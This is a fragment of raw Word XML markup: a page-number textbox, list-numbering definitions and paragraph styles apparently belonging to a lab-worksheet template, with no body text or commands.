                                  <w:szCs w:val="22"/>
                                </w:rPr>
                                <w:fldChar w:fldCharType="begin"/>
                              </w:r>
                              <w:r>
                                <w:instrText xml:space="preserve"> PAGE    \* MERGEFORMAT </w:instrText>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                                  <w:sz w:val="22"/>
                                  <w:szCs w:val="22"/>
                                </w:rPr>
                                <w:fldChar w:fldCharType="separate"/>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                  <w14:textFill>
                                    <w14:solidFill>
                                      <w14:schemeClr w14:val="bg1"/>
                                    </w14:solidFill>
                                  </w14:textFill>
                                </w:rPr>
                                <w:t>2</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                  <w14:textFill>
                                    <w14:solidFill>
                                      <w14:schemeClr w14:val="bg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_x0000_s1026" o:spid="_x0000_s1026" o:spt="5" type="#_x0000_t5" style="position:absolute;left:0pt;height:161.8pt;width:167.4pt;mso-position-horizontal:right;mso-position-horizontal-relative:page;mso-position-vertical:bottom;mso-position-vertical-relative:page;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" fillcolor="#D2EAF1" filled="t" stroked="f" coordsize="21600,21600" o:gfxdata="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m8dYUNUAAAAFAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAhQAFAAAAAgAh07iQN6/sjA6AgAAcQQAAA4AAAAAAAAAAQAgAAAAJAEAAGRycy9l&#10;Mm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAANAFAAAAAA==&#10;" adj="21600">
                  <v:fill on="t" focussize="0,0"/>
                  <v:stroke on="f"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="15B8BE4A">
                        <w:pPr>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:szCs w:val="72"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                          </w:rPr>
                          <w:fldChar w:fldCharType="begin"/>
                        </w:r>
                        <w:r>
                          <w:instrText xml:space="preserve"> PAGE    \* MERGEFORMAT </w:instrText>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                            <w:sz w:val="22"/>
                            <w:szCs w:val="22"/>
                          </w:rPr>
                          <w:fldChar w:fldCharType="separate"/>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                            <w:sz w:val="72"/>
                            <w:szCs w:val="72"/>
                            <w14:textFill>
                              <w14:solidFill>
                                <w14:schemeClr w14:val="bg1"/>
                              </w14:solidFill>
                            </w14:textFill>
                          </w:rPr>
                          <w:t>2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                            <w:sz w:val="72"/>
                            <w:szCs w:val="72"/>
                            <w14:textFill>
                              <w14:solidFill>
                                <w14:schemeClr w14:val="bg1"/>
                              </w14:solidFill>
                            </w14:textFill>
                          </w:rPr>
                          <w:fldChar w:fldCharType="end"/>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>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D3B45"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="817D3B45"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="82F990EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82F990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8B5577D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8B557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B68FAA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB68FA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18CD011"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B18CD0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F020963"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF020963"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="EAD1E047"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAD1E0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44A0B3B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="044A0B3B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="1217228C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1217228C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="48"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="36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9">
    <w:nsid w:val="184DBE34"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="184DBE34"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:nsid w:val="1DF612DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DF612DD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Part %2:"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="660" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Step %3:"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="41"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="108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1">
    <w:nsid w:val="241B643A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="241B64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BF23836"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BF23836"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="40"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1020" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1380" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1020" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1380" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2820" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%6)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3180" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3540" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3900" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4260" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:nsid w:val="6645DBD2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6645DBD2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="71800B81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71800B81"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>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2"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>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num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="Part %1:"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="0" w:firstLine="0"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="Task %2:"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="0" w:firstLine="0"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="Step %3:"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="0" w:firstLine="0"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="3">
      <w:lvl w:ilvl="3" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="lowerLetter"/>
        <w:lvlText w:val="%4."/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="left" w:pos="720"/>
          </w:tabs>
          <w:ind w:left="720" w:hanging="360"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="4">
      <w:lvl w:ilvl="4" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%5)"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="left" w:pos="1080"/>
          </w:tabs>
          <w:ind w:left="108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657"/>
    <w:rsid w:val="000367EF"/>
    <w:rsid w:val="000C4AFD"/>
    <w:rsid w:val="00166EBD"/>
    <w:rsid w:val="001949F6"/>
    <w:rsid w:val="001A565D"/>
    <w:rsid w:val="00235C5F"/>
    <w:rsid w:val="0026679D"/>
    <w:rsid w:val="003C6317"/>
    <w:rsid w:val="00507E1B"/>
    <w:rsid w:val="00584657"/>
    <w:rsid w:val="00593D67"/>
    <w:rsid w:val="006B0C53"/>
    <w:rsid w:val="007561DA"/>
    <w:rsid w:val="0079424D"/>
    <w:rsid w:val="009C09C6"/>
    <w:rsid w:val="00B7353C"/>
    <w:rsid w:val="00BC2E78"/>
    <w:rsid w:val="00C1603F"/>
    <w:rsid w:val="00CD7B0E"/>
    <w:rsid w:val="00E00582"/>
    <w:rsid w:val="00EC4713"/>
    <w:rsid w:val="00F23C04"/>
    <w:rsid w:val="00F40384"/>
    <w:rsid w:val="00FF6283"/>
    <w:rsid w:val="01E03B7D"/>
    <w:rsid w:val="0E7E311F"/>
    <w:rsid w:val="2120474E"/>
    <w:rsid w:val="270A541B"/>
    <w:rsid w:val="2A523487"/>
    <w:rsid w:val="2F083792"/>
    <w:rsid w:val="38957564"/>
    <w:rsid w:val="50B50D81"/>
    <w:rsid w:val="5E473D32"/>
    <w:rsid w:val="76015B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3"/>
    <w:link w:val="22"/>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4">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="23"/>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5">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="24"/>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6">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:link w:val="25"/>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7">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="26"/>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8">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10">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1">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3">
    <w:name w:val="Body Text L25"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="6570"/>
        <w:tab w:val="right" w:pos="10080"/>
        <w:tab w:val="right" w:pos="10800"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="55"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="12"/>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9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="32"/>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1">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="31"/>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2">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="104862" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="12"/>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4">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="104862" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="104862" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="104862" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="8"/>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2"/>
    <w:link w:val="9"/>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2"/>
    <w:link w:val="10"/>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2"/>
    <w:link w:val="11"/>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2"/>
    <w:link w:val="21"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="12"/>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2"/>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1"/>
    <w:basedOn w:val="12"/>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Quote Char"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="37"/>
    <w:qFormat/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="104862" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="Intense Reference1"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="104862" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="Bullet level 1"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="SubStep Alpha"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="Body Text L50"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="Answer Line L50"/>
    <w:basedOn w:val="44"/>
    <w:next w:val="42"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44">
    <w:name w:val="Answer Line L25"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="Visual"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46">
    <w:name w:val="CMD"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="47">
    <w:name w:val="CMD Output"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="18"/>
